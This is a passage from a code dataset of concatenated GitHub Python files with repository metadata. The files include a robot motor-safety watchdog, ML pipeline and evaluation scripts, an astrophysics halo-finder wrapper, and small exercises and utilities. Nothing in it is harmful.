@classmethod\n def _reset(cls) -> None:\n with cls.__listMutex:\n cls.__instanceList.clear()\n\n def __init__(self) -> None:\n self.__enabled = False\n self.__expiration = self.DEFAULT_SAFETY_EXPIRATION\n self.__stopTime = Timer.getFPGATimestamp()\n self.__mutex = threading.Lock()\n with self.__listMutex:\n self.__instanceList.add(self)\n\n def feed(self) -> None:\n \"\"\"Feed the motor safety object.\n\n Resets the timer on this object that is used to do the timeouts.\n \"\"\"\n with self.__mutex:\n self.__stopTime = Timer.getFPGATimestamp() + self.__expiration\n\n def setExpiration(self, expirationTime: float) -> None:\n \"\"\"Set the expiration time for the corresponding motor safety object.\n\n :param expirationTime: The timeout value in seconds.\n \"\"\"\n with self.__mutex:\n self.__expiration = expirationTime\n\n def getExpiration(self) -> float:\n \"\"\"Retrieve the timeout value for the corresponding motor safety object.\n\n :returns: the timeout value in seconds.\n \"\"\"\n with self.__mutex:\n return self.__expiration\n\n def isAlive(self) -> bool:\n \"\"\"Determine of the motor is still operating or has timed out.\n\n :returns: True if the motor is still operating normally and hasn't\n timed out.\n \"\"\"\n with self.__mutex:\n return not self.__enabled or self.__stopTime > Timer.getFPGATimestamp()\n\n def check(self) -> None:\n \"\"\"Check if this motor has exceeded its timeout.\n This method is called periodically to determine if this motor has\n exceeded its timeout value. If it has, the stop method is called,\n and the motor is shut down until its value is updated again.\n \"\"\"\n from .robotstate import RobotState\n\n with self.__mutex:\n enabled = self.__enabled\n stopTime = self.__stopTime\n\n if not enabled or RobotState.isDisabled() or RobotState.isTest():\n return\n\n if stopTime < Timer.getFPGATimestamp():\n # TODO: fix this, causes recursion error\n logger.warning(\n \"%s... Output not updated often enough.\" % self.getDescription()\n )\n\n self.stopMotor()\n\n def setSafetyEnabled(self, enabled: bool) -> None:\n \"\"\"Enable/disable motor safety for this device.\n\n Turn on and off the motor safety option for this PWM object.\n\n :param enabled: True if motor safety is enforced for this object\n \"\"\"\n with self.__mutex:\n self.__enabled = bool(enabled)\n\n def isSafetyEnabled(self) -> bool:\n \"\"\"Return the state of the motor safety enabled flag.\n\n Return if the motor safety is currently enabled for this device.\n\n :returns: True if motor safety is enforced for this device\n \"\"\"\n with self.__mutex:\n return self.__enabled\n\n @classmethod\n def checkMotors(cls) -> None:\n \"\"\"Check the motors to see if any have timed out.\n This static method is called periodically to poll all the motors and\n stop any that have timed out.\n \"\"\"\n with cls.__listMutex:\n for elem in cls.__instanceList:\n elem.check()\n\n # abstract methods\n\n def stopMotor(self) -> None:\n raise NotImplementedError\n\n def getDescription(self) -> str:\n raise NotImplementedError\n","repo_name":"billyGirard/motorTest","sub_path":"testvenv/lib/python3.5/site-packages/wpilib/motorsafety.py","file_name":"motorsafety.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28613128337","text":"import prefect\nfrom prefect import Flow\nfrom prefect.schedules.schedules import CronSchedule\nfrom task.prep import *\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler\n\nfrom task.prep2 import etl, train_mlflow_ray\n\nDF_PATH = './train.csv'\nBATCH_SIZE = 64\nTRAINING_EPOCH=3\nDEVICE = 'cpu'\nCRITERION = torch.nn.CrossEntropyLoss().to(DEVICE)\nLEARNING_RATE = 1e-3\ntrain_transform = transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5,), std=(1.0,))\n ])\nNet = MnistNet()\noptimizer = torch.optim.Adam(Net.parameters(), lr=LEARNING_RATE)\n\n\nclass Pipeline:\n _project_name = None\n _flow_name = None\n _logger = None\n _flow = None\n\n '''\n _param1 = Parameter(\"data_path\", default=\"default_path\")\n _param2 = Parameter(\"model_name\", default=\"GPN\")\n '''\n\n def __init__(self, project_name, flow_name, schedule=None):\n self._logger = prefect.context.get(\"logger\")\n self._logger.info(\"Create Pipeline\")\n\n self._project_name = project_name\n self._flow_name = flow_name\n self._schedule = schedule\n\n def create_flow(self):\n self._logger.info(f\"Create {self._flow_name} flow\")\n with Flow(self._flow_name) as flow:\n \"\"\"\n\n data = load_data(self._param1)\n prep_data = preprocess(data)\n model = train(self._param2, prep_data)\n save_model(model)\n \n \"\"\"\n # name = hello_task(\"kyle\")\n # name1 = hi_task(name)\n # name2 = hi_task(name)\n # buy_task(name1 + name2)\n # buy_task(name1 + name2)\n\n\n # 1 test\n\n # train_df, valid_df = load_dataset(df_path=DF_PATH)\n\n # train_loader, valid_loader, total_batch = preprocess_train(train_df, valid_df)\n\n # train_Net = cnn_training(train_loader=train_loader, total_batch=total_batch)\n # save_model(train_Net)\n # Net2 = return_Net2(train_Net)\n # feature_weight_df = make_knn_feature(train_df=train_df, train_loader=train_loader, Net2=Net2)\n # KNN = knn_training(feature_weight_df=feature_weight_df)\n # knn_result = predict_knn_model(323, train_df=train_df, valid_df=valid_df, Net2=Net2, KNN=KNN)\n # save_result(knn_result)\n\n # 2 test\n X, y = etl()\n\n a = train_mlflow_ray(X, y)\n\n # implement here\n # ...\n\n self._flow = flow\n self._register()\n\n def _register(self):\n self._logger.info(\n f\"Regist {self._flow_name} flow to {self._project_name} project\"\n )\n self._logger.info(f\"Set Cron {self._schedule}\")\n\n self._flow.register(\n project_name=self._project_name, \n idempotency_key=self.flow.serialized_hash()\n )\n\n if self._schedule:\n self._set_cron()\n\n def _set_cron(self):\n self.flow.schedule(CronSchedule(self._schedule))\n\n @property\n def flow(self):\n return self._flow\n\n @property\n def project_name(self):\n return self._project_name\n\n @property\n def flow_name(self):\n return self._flow_name\n","repo_name":"ehddnr301/prefect","sub_path":"Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33328235425","text":"import abc\nfrom typing import Any, Dict, List, NamedTuple, Optional, Sequence, Union\n\nimport numpy as np\nfrom optformer_neurips2022.t5x import utils\n\n\nfrom vizier import pyvizier as shared_pyvizier\nfrom vizier.service import pyvizier as oss_pyvizier\n\nScalar = Union[int, float, str]\nValue = Union[Scalar, Sequence[Scalar]]\nStudyInfo = Dict[str, Value]\nParameterInfo = Dict[str, Value]\nParameterValueDict = Dict[str, Scalar]\nParameterValueList = List[Scalar]\nParameterValues = Union[ParameterValueDict, ParameterValueList]\nParameterIntValues = List[int]\nMetricValueDict = Dict[str, Scalar]\nMetricValueList = List[Scalar]\nMetricValues = Union[MetricValueDict, MetricValueList]\nAlgorithmInfo = Union[str, int] # int corresponds to Algorithm ENUM\n\nAux = Dict[str, Any] # Auxiliary information to be returned from converter.\n\n# Token to denote the end of study information and the start of parameters'\n# information in the config.\nSTUDY_PARAMETER_SEPARATION_TOKEN = '&'\n# Token to denote separation between two parameters' information string in the\n# study config.\nPARAMETER_SEPARATION_TOKEN = '*'\n# Token to denote end of old trial and start of new trial.\nTRIAL_SEPARATION_TOKEN = '|'\n# parameter_metric_separation_token: Token to denote separation between a\n# trial's parameters and metrics.\nPARAMETER_METRIC_SEPARATION_TOKEN = '*'\n\n_MINIMUM_CONFIG_PROBABILITY = {\n 'bbob': 1.0,\n 'default': 0.1,\n}\n\n\nclass ConvertedStudy(NamedTuple):\n inputs: str # Conditioning inputs.\n target_inputs: str # Inputs aligned with the targets.\n targets: str # Targets.\n # The number of parameters with a non-fixed value in the search space. For a\n # conditional search space, we need to count all possible parameters.\n num_parameters: int\n aux: Aux\n num_permuted_trials: int = 0\n\n\nDEFAULT_VIZIER_ALGORITHM = 0\n\n\ndef get_algorithm(sc,\n default_algorithm = None):\n \"\"\"Gets algorithm name/ID.\"\"\"\n # Searches metadata for 'designer' key for generated studies.\n algo_info = sc.metadata.get('designer', default=None)\n if algo_info is None:\n # Returns standard algorithm ENUM for database studies.\n # WARNING: This could return 'DEFAULT' enum even for empty studies!\n return sc.algorithm\n else:\n algo_info = str(algo_info)\n if default_algorithm is not None and algo_info == default_algorithm:\n return DEFAULT_VIZIER_ALGORITHM\n else:\n return algo_info\n\n\nclass Converter(abc.ABC):\n \"\"\"Converts Studies into text representations for language models.\n\n These strings will later be fed into a tokenizer, which is dependent on\n Transformer pipeline.\n \"\"\"\n\n @abc.abstractmethod\n def study_to_texts(self,\n study):\n raise NotImplementedError('Abstract method')\n\n def set_config(self, config):\n \"\"\"Override configurations.\"\"\"\n raise NotImplementedError('Abstract method')\n\n def pytrial_to_parameter_values(\n self, aux,\n trial):\n \"\"\"Convert a trial to parameter values represented in integers.\"\"\"\n raise NotImplementedError('Abstract method')\n\n def parameter_texts_to_trial(\n self, aux, parameter_texts):\n \"\"\"Reverse the mapping from parameter value to text.\"\"\"\n raise NotImplementedError('Abstract method')\n\n @property\n def trial_token_scheme(self):\n raise NotImplementedError('Abstract property')\n\n @property\n def num_quantized_values(self):\n \"\"\"Number of quantized objective values.\"\"\"\n raise NotImplementedError('Abstract property')\n\n def objective_value_to_int(\n self,\n value,\n aux,\n metric_name = None):\n \"\"\"Convert a real objective value to a quantized integer.\"\"\"\n raise NotImplementedError('Abstract method')\n","repo_name":"neurips2022optformer/optformer_neurips2022","sub_path":"converters/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"26660841921","text":"\n\nimport os, sys\nimport numpy as np\n\nprintstr ='''Usage: py_rockstar filename \n -exe/-EXE exe_path \n -c/-config/-config_file config_file \n -o/-output/-outputfile outputfile\n\nExample:\n py_rockstar snp04441e.\\*\n\nBash example:\n for ((i=0; i<=8; i++))\n do\n\tnowfile=Omega_0.3071_binary.nbox2_overlap15.0_xyz0.0to150.0.ibox$i\n\techo $nowfile\n\tpy_rockstar $nowfile\n #jsub -n 1 -o ${nowfile}.output -e ${nowfile}.er py_rockstar $nowfile\n #sleep 2\n done\n '''\n\nif len(sys.argv) <=1:\n print(printstr)\n sys.exit()\n\ninputfile = sys.argv[1]\nprint('\\t set inputfile as: ', inputfile)\n\nexe_path = '/home/xiaodongli/software/Rockstar/rockstar '\nconfig_file = '/home/xiaodongli/software/Rockstar/quickstart.cfg' \noutputfile = None\n\nif len(sys.argv) > 2:\n for iarg in range(2,len(sys.argv),2):\n str1, str2 = sys.argv[iarg:iarg+2]\n if str1 in ['-exe', '-EXE']:\n exe_path = str2\n print('\\t set exe as: ', exe_path)\n elif str1 in ['-c', '-config', '-config_file']:\n config_file = str2\n print('\\t set config_file as: ', config_file)\n elif str1 in ['-o', '-output', '-outputfile']:\n outputfile = str2\n print('\\t set outputfile as: ', outputfile)\n else:\n print('Unknown option: ', str1)\n print(printstr)\n sys.exit()\n\nif outputfile == None:\n print(inputfile)\n outputfile = inputfile.replace(\".*\",\"\").replace(\".?\",\"\").replace(\"\\\\\",'').replace(\"*\",\"\").replace(\"?\",\"\")+'_rockstar_halo'\n print('\\t automatically set outputfile as: ', outputfile)\n\niran = np.random.uniform(10000000,99999999); ranpath = 'rs_ranpath_'+str(iran)\n\ncmd1 = 'mkdir -p '+ranpath \ncmd2 = 'cd '+ranpath\ncmd3 = 'ln -s ../'+inputfile+' ./'\ncmd4 = exe_path+' -c '+config_file +' ' + inputfile\ncmd5 = 'mv halos_0.0.ascii ../'+outputfile+'.ascii' \ncmd6 = 'mv halos_0.0.bin ../'+outputfile+'.bin'\ncmd7 = 'mv rockstar.cfg ../'+outputfile+'.cfg'\ncmd8 = 'cd ..'\ncmd9 = '/usr/bin/rm -rf '+ranpath\n\ncmd = ' && '.join([cmd1,cmd2,cmd3,cmd4,cmd5,cmd6,cmd7,cmd8,cmd9])\n\n\nprint('Now execute the command:\\n\\t\\t', cmd, '...')\nprint(os.popen(cmd).read())\n\n#print('rename the files...\\n\\t\\t', cmd5, '\\n\\t\\t', cmd6); \n\nprint('Convert file to x,y,z,vx,vy,vz,mvir,vmax format...')\ncmd = 'LSS_rockstar_select_xyzvxvyvz_mvir_vmax '+outputfile+'.ascii'\nprint('\\t\\t', cmd); print(os.popen(cmd).read())\n","repo_name":"xiaodongli1986/pythonlib","sub_path":"src/py_rockstar.py","file_name":"py_rockstar.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"70013293652","text":"\"\"\"\n10. Write a Python program to print the even numbers from a given list.\nSample List : [1, 2, 3, 4, 5, 6, 7, 8, 9]\nExpected Result : [2, 4, 6, 8]\n\"\"\"\nsample_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\ndef print_even_numbers(lst):\n even_list = []\n for item in lst:\n if item % 2 == 0:\n even_list.append(item)\n print(even_list)\n\n\nprint_even_numbers(sample_list)","repo_name":"AnjalBam/IWassign-data-types-functions-python","sub_path":"functions/10_even_numbers_from_list.py","file_name":"10_even_numbers_from_list.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20012092589","text":"import sklearn.metrics as metrics\r\nfrom wilsonscore import wilsonscore\r\nimport numpy as np\r\n\r\ndef evaluate(model, \r\n X_train_feat, y_train,\r\n X_val_feat, y_val,\r\n X_test_feat, y_test,\r\n NUM_CLASSES):\r\n X_train_prob = model.predict(X_train_feat)\r\n X_val_prob = model.predict(X_val_feat)\r\n X_test_prob = model.predict(X_test_feat)\r\n\r\n if len(X_train_prob.shape) > 1:\r\n assert len(X_train_prob.shape) == 2\r\n assert len(X_val_prob.shape) == 2\r\n assert len(X_test_prob.shape) == 2\r\n X_train_pred = np.argmax(X_train_prob, axis=1)\r\n X_val_pred = np.argmax(X_val_prob, axis=1)\r\n X_test_pred = np.argmax(X_test_prob, axis=1)\r\n else:\r\n X_train_pred = X_train_prob\r\n X_val_pred = X_val_prob\r\n X_test_pred = X_test_prob\r\n\r\n # f1 score\r\n if NUM_CLASSES == 2:\r\n train_mean_f1 = metrics.f1_score(y_train, X_train_pred, average='binary')\r\n val_mean_f1 = metrics.f1_score(y_val, X_val_pred, average='binary')\r\n test_mean_f1 = metrics.f1_score(y_test, X_test_pred, average='binary')\r\n\r\n train_weighted_f1 = -0.\r\n val_weighted_f1 = -.0\r\n test_weighted_f1 = -.0\r\n else:\r\n train_mean_f1 = metrics.f1_score(y_train, X_train_pred, average='macro')\r\n val_mean_f1 = metrics.f1_score(y_val, X_val_pred, average='macro')\r\n test_mean_f1 = metrics.f1_score(y_test, X_test_pred, average='macro')\r\n\r\n train_weighted_f1 = metrics.f1_score(y_train, X_train_pred, average='weighted')\r\n val_weighted_f1 = metrics.f1_score(y_val, X_val_pred, average='weighted')\r\n test_weighted_f1 = metrics.f1_score(y_test, X_test_pred, average='weighted')\r\n\r\n # wilson score\r\n wilson_score_low, wilson_score_high = wilsonscore(\r\n test_mean_f1, y_test.shape[0])\r\n print ('train: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n train_mean_f1, train_weighted_f1))\r\n print ('val: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n val_mean_f1, val_weighted_f1))\r\n print ('test: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n test_mean_f1, test_weighted_f1))\r\n print ('wilson score | low: {:.4} | high: {:.4}'.format(wilson_score_low, wilson_score_high))","repo_name":"hyeokhyen/sat","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"23551091491","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass ListNode:\n def __init__(self, x) :\n if type(x) is list:\n ptr = dummyHead = ListNode(0)\n for val in x:\n ptr.next = ListNode(val)\n ptr = ptr.next\n self.val = dummyHead.next.val\n self.next = dummyHead.next.next\n else:\n self.val = x\n self.next = None ","repo_name":"guangyw/leetcode_python","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4415558595","text":"import torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport os\nimport cv2\nimport pdb\nfrom onehot import onehot\nimport torch\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nclass BagDataset(Dataset):\n\n def __init__(self, transform=None):\n self.transform = transform \n def __len__(self):\n return len(os.listdir('last'))\n\n def __getitem__(self, idx):\n img_name = os.listdir('last')[idx]\n imgA = cv2.imread('last/'+img_name)\n imgA = cv2.resize(imgA, (160, 160))\n imgB = cv2.imread('last_msk/'+img_name, 0)\n imgB = cv2.resize(imgB, (160, 160))\n imgB = imgB/255\n imgB = imgB.astype('uint8')\n imgB = onehot(imgB, 2)\n imgB = imgB.swapaxes(0, 2).swapaxes(1, 2)\n imgB = torch.FloatTensor(imgB)\n #print(imgB.shape)\n if self.transform:\n imgA = self.transform(imgA) \n item = {'A':imgA, 'B':imgB}\n return item\n\nbag = BagDataset(transform)\ndataloader = DataLoader(bag, batch_size=4, shuffle=True, num_workers=4)\nif __name__ =='__main__':\n for batch in dataloader:\n break\n\n\n\n\n\n\n","repo_name":"yunlongdong/FCN-pytorch","sub_path":"BagData.py","file_name":"BagData.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"66"} +{"seq_id":"74232339731","text":"import cv2\r\nimport numpy as np\r\n# Create blank images for each shape\r\nline_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\nrectangle_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\nellipse_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\ncircle_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\n\r\n# Draw a line\r\ncv2.line(line_image, (50, 50), (350, 50), (0, 0, 255), 2)\r\n# Draw a rectangle\r\ncv2.rectangle(rectangle_image, (100, 100), (300, 300), (0, 255, 0), 2)\r\n# Draw an ellipse\r\ncv2.ellipse(ellipse_image, (200, 200), (100, 50), 0, 0, 360, (255, 0, 0), 2)\r\n# Draw a circle\r\ncv2.circle(circle_image, (200, 200), 50, (255, 255, 255), -1) # -1 for filled circle\r\n\r\n# Display the image\r\ncv2.imshow(\"Line\", line_image)\r\ncv2.waitKey(1000) # Display for 1 second (1000 milliseconds)\r\ncv2.imshow(\"Rectangle\", rectangle_image)\r\ncv2.waitKey(1000)\r\ncv2.imshow(\"Ellipse\", ellipse_image)\r\ncv2.waitKey(1000)\r\ncv2.imshow(\"Circle\", circle_image)\r\n# Wait for a key press and close all windows when any key is pressed\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Tharunraj-s/controlone.ai","sub_path":"DrawFig/draw_fig.py","file_name":"draw_fig.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5376563865","text":"import numpy as np\nimport copy\n\ndef make_batch_masks(data_index, batch_size=None, n_batch=None, random_state=0,\n residue='ignore', shuffle=True):\n \"\"\"\n Make list of batch_masks which splits train data into batches\n\n Parameters\n ----------\n data_index: array_like or set of int\n Indices of data to split into batches.\n batch_size: int or None\n Number of data in each batch\n n_batch: int or None\n Number of batch\n It is invalid when batch_size is specified.\n residue: str\n How to treat residues of batches (i.e. n_data%batch_size or n_data%n_batch)\n 'ignore': Do not assign any batch to residues\n 'new': residues consist new batch\n 'include': residues are classified to existing batchess\n shuffle: bool\n If True, datas are batched randomly.\n if False, datas are batched in order of data_index\n random_state: int\n Seed of RNG which classifies batches\n\n Returns\n -------\n batch_masks: list of np.ndarray(batch_size) of int\n list of indices of data included in each batch.\n batch_size may vary among batch_masks due to residues.\n\n Notes\n -----\n Appoint at least either batch_size or n_batch.\n \"\"\"\n data_index = copy.deepcopy(data_index)\n assert (batch_size is not None) or (n_batch is not None)\n n_data = len(data_index)\n rstate = np.random.RandomState(random_state)\n if residue == 'ignore':\n if batch_size is not None:\n n_batch = n_data // batch_size\n n_datas_batch = np.full(n_batch, fill_value=batch_size)\n elif residue == 'include':\n if 0 < n_data < batch_size:\n n_datas_batch = [n_data]\n else:\n if batch_size is not None:\n n_batch = n_data // batch_size\n n_datas_batch = []\n for i in range(n_batch):\n n_datas_batch.append((n_data-sum(n_datas_batch)) // (n_batch-i))\n elif residue == 'new':\n if batch_size is not None:\n n_batch = n_data // batch_size\n n_datas_batch = list(np.full(n_batch, fill_value=batch_size))\n res = n_data - n_batch*batch_size \n if res > 0:\n n_datas_batch.append(res)\n else:\n raise ValueError(f\"Unsupported type of handling residue: {residue}\")\n\n data_index = np.array(data_index)\n if shuffle:\n rstate.shuffle(data_index)\n n_batch = len(n_datas_batch)\n batch_masks = []\n for n_data_batch in n_datas_batch:\n batch_masks.append(data_index[:n_data_batch])\n data_index = data_index[n_data_batch:]\n return batch_masks\n\n","repo_name":"mizuno-group/ChiralityMisunderstanding","sub_path":"src/data/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16203173644","text":"import tensorflow as tf\nimport logging\n\nclass Logger(object):\n \"\"\"Tensorboard logger.\"\"\"\n\n def __init__(self, log_dir):\n \"\"\"Initialize summary writer.\"\"\"\n self.writer = tf.summary.FileWriter(log_dir)\n\n def scalar_summary(self, tag, value, step):\n \"\"\"Add scalar summary.\"\"\"\n summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])\n self.writer.add_summary(summary, step)\n\n\nclass EventLogger:\n def __init__(self, name, out_path):\n \"\"\"Event logger to print the event to console and save it to file.\n \n Args:\n name: name of the logger\n out_path: complete path to save the file\n \"\"\"\n # Create a custom logger\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logging.INFO)\n\n # Create handlers\n file_hdl = logging.FileHandler(out_path)\n console_hdl = logging.StreamHandler()\n\n # Create formatters and add it to handlers\n formatter = logging.Formatter(\n '[%(asctime)s] %(message)s', datefmt='%d-%b-%y %H:%M:%S'\n )\n file_hdl.setFormatter(formatter)\n console_hdl.setFormatter(formatter)\n\n # Add handlers to the logger\n self.logger.addHandler(file_hdl)\n self.logger.addHandler(console_hdl)\n \n def log(self, message):\n \"\"\"Log the message (str)\"\"\"\n self.logger.info(message)","repo_name":"Ziyu0/max-sliced-stargan","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"66"} +{"seq_id":"4784516379","text":"# Make a program that reads the year of birth of a young person and reports, according to their age:\n# If he is still going to enlist in the military; If it's time to enlist; If you are past the time of enlistment.\n# Your program should also show how much time is left or past the deadline.\n\nfrom datetime import date\n\nbirth = int(input('Enter your year of birth: '))\nyear = date.today().year\nage = year - birth\nprint('Whoever was born in {} is {} years ond in {}'.format(birth, age, year))\nif age < 18:\n s = 18 - age\n print('Enlistment is still {} years away. \\nYour enlistment will be in {}.'.format(s, year + s))\nelif age > 18:\n s = age - 18\n print('You should have signed up {} years ago. \\nYour enlistment was in {}'.format(s, year - s))\nelse:\n print('You have to enlist IMMEDIATELY.')\n","repo_name":"MCLeitao/Python-Exercises","sub_path":"download-package/PythonExercises/ex039.py","file_name":"ex039.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12913839026","text":"\nimport torch\nimport torchaudio\nimport numpy as np\nimport scipy.signal\nclass EMAWarmup:\n \"\"\"Implements an EMA warmup using an inverse decay schedule.\n If inv_gamma=1 and power=1, implements a simple average. inv_gamma=1, power=2/3 are\n good values for models you plan to train for a million or more steps (reaches decay\n factor 0.999 at 31.6K steps, 0.9999 at 1M steps), inv_gamma=1, power=3/4 for models\n you plan to train for less (reaches decay factor 0.999 at 10K steps, 0.9999 at\n 215.4k steps).\n Args:\n inv_gamma (float): Inverse multiplicative factor of EMA warmup. Default: 1.\n power (float): Exponential factor of EMA warmup. Default: 1.\n min_value (float): The minimum EMA decay rate. Default: 0.\n max_value (float): The maximum EMA decay rate. Default: 1.\n start_at (int): The epoch to start averaging at. Default: 0.\n last_epoch (int): The index of last epoch. Default: 0.\n \"\"\"\n\n def __init__(self, inv_gamma=1., power=1., min_value=0., max_value=1., start_at=0,\n last_epoch=0):\n self.inv_gamma = inv_gamma\n self.power = power\n self.min_value = min_value\n self.max_value = max_value\n self.start_at = start_at\n self.last_epoch = last_epoch\n\n def state_dict(self):\n \"\"\"Returns the state of the class as a :class:`dict`.\"\"\"\n return dict(self.__dict__.items())\n\n def load_state_dict(self, state_dict):\n \"\"\"Loads the class's state.\n Args:\n state_dict (dict): scaler state. Should be an object returned\n from a call to :meth:`state_dict`.\n \"\"\"\n self.__dict__.update(state_dict)\n\n def get_value(self):\n \"\"\"Gets the current EMA decay rate.\"\"\"\n epoch = max(0, self.last_epoch - self.start_at)\n value = 1 - (1 + epoch / self.inv_gamma) ** -self.power\n return 0. if epoch < 0 else min(self.max_value, max(self.min_value, value))\n\n def step(self):\n \"\"\"Updates the step count.\"\"\"\n self.last_epoch += 1\n\n\n#from https://github.com/csteinmetz1/auraloss/blob/main/auraloss/perceptual.py\nclass FIRFilter(torch.nn.Module):\n \"\"\"FIR pre-emphasis filtering module.\n Args:\n filter_type (str): Shape of the desired FIR filter (\"hp\", \"fd\", \"aw\"). Default: \"hp\"\n coef (float): Coefficient value for the filter tap (only applicable for \"hp\" and \"fd\"). Default: 0.85\n ntaps (int): Number of FIR filter taps for constructing A-weighting filters. Default: 101\n plot (bool): Plot the magnitude respond of the filter. Default: False\n Based upon the perceptual loss pre-empahsis filters proposed by\n [Wright & Välimäki, 2019](https://arxiv.org/abs/1911.08922).\n A-weighting filter - \"aw\"\n First-order highpass - \"hp\"\n Folded differentiator - \"fd\"\n Note that the default coefficeint value of 0.85 is optimized for\n a sampling rate of 44.1 kHz, considering adjusting this value at differnt sampling rates.\n \"\"\"\n\n def __init__(self, filter_type=\"hp\", coef=0.85, fs=44100, ntaps=101, plot=False): \n \"\"\"Initilize FIR pre-emphasis filtering module.\"\"\"\n super(FIRFilter, self).__init__()\n self.filter_type = filter_type\n self.coef = coef\n self.fs = fs\n self.ntaps = ntaps\n self.plot = plot\n\n if ntaps % 2 == 0:\n raise ValueError(f\"ntaps must be odd (ntaps={ntaps}).\")\n\n if filter_type == \"hp\":\n self.fir = torch.nn.Conv1d(1, 1, kernel_size=3, bias=False, padding=1)\n self.fir.weight.requires_grad = False\n self.fir.weight.data = torch.tensor([1, -coef, 0]).view(1, 1, -1)\n elif filter_type == \"fd\":\n self.fir = torch.nn.Conv1d(1, 1, kernel_size=3, bias=False, padding=1)\n self.fir.weight.requires_grad = False\n self.fir.weight.data = torch.tensor([1, 0, -coef]).view(1, 1, -1)\n elif filter_type == \"aw\":\n # Definition of analog A-weighting filter according to IEC/CD 1672.\n f1 = 20.598997\n f2 = 107.65265\n f3 = 737.86223\n f4 = 12194.217\n A1000 = 1.9997\n\n NUMs = [(2 * np.pi * f4) ** 2 * (10 ** (A1000 / 20)), 0, 0, 0, 0]\n DENs = np.polymul(\n [1, 4 * np.pi * f4, (2 * np.pi * f4) ** 2],\n [1, 4 * np.pi * f1, (2 * np.pi * f1) ** 2],\n )\n DENs = np.polymul(\n np.polymul(DENs, [1, 2 * np.pi * f3]), [1, 2 * np.pi * f2]\n )\n\n # convert analog filter to digital filter\n b, a = scipy.signal.bilinear(NUMs, DENs, fs=fs)\n\n # compute the digital filter frequency response\n w_iir, h_iir = scipy.signal.freqz(b, a, worN=512, fs=fs)\n\n # then we fit to 101 tap FIR filter with least squares\n taps = scipy.signal.firls(ntaps, w_iir, abs(h_iir), fs=fs)\n\n # now implement this digital FIR filter as a Conv1d layer\n self.fir = torch.nn.Conv1d(\n 1, 1, kernel_size=ntaps, bias=False, padding=ntaps // 2\n )\n self.fir.weight.requires_grad = False\n self.fir.weight.data = torch.tensor(taps.astype(\"float32\")).view(1, 1, -1)\n\n def forward(self, error):\n \"\"\"Calculate forward propagation.\n Args:\n input (Tensor): Predicted signal (B, #channels, #samples).\n target (Tensor): Groundtruth signal (B, #channels, #samples).\n Returns:\n Tensor: Filtered signal.\n \"\"\"\n self.fir.weight.data=self.fir.weight.data.to(error.device)\n error=error.unsqueeze(1)\n error = torch.nn.functional.conv1d(\n error, self.fir.weight.data, padding=self.ntaps // 2\n )\n error=error.squeeze(1)\n return error\n\ndef resample_batch(audio, fs, fs_target, length_target):\n\n device=audio.device\n dtype=audio.dtype\n B=audio.shape[0]\n #if possible resampe in a batched way\n #check if all the fs are the same and equal to 44100\n if fs_target==22050:\n if (fs==44100).all():\n audio=torchaudio.functional.resample(audio, 2,1)\n return audio[:, 0:length_target] #trow away the last samples\n elif (fs==48000).all():\n #approcimate resamppleint\n audio=torchaudio.functional.resample(audio, 160*2,147)\n return audio[:, 0:length_target]\n else:\n #if revious is unsuccesful bccause we have examples at 441000 and 48000 in the same batch,, just iterate over the batch\n proc_batch=torch.zeros((B,length_target), device=device)\n for i, (a, f_s) in enumerate(zip(audio, fs)): #I hope this shit wll not slow down everythingh\n if f_s==44100:\n #resample by 2\n a=torchaudio.functional.resample(a, 2,1)\n elif f_s==48000:\n a=torchaudio.functional.resample(a, 160*2,147)\n else:\n print(\"WARNING, strange fs\", f_s)\n \n proc_batch[i]=a[0:length_target]\n return proc_batch\n elif fs_target==44100:\n if (fs==44100).all():\n return audio[:, 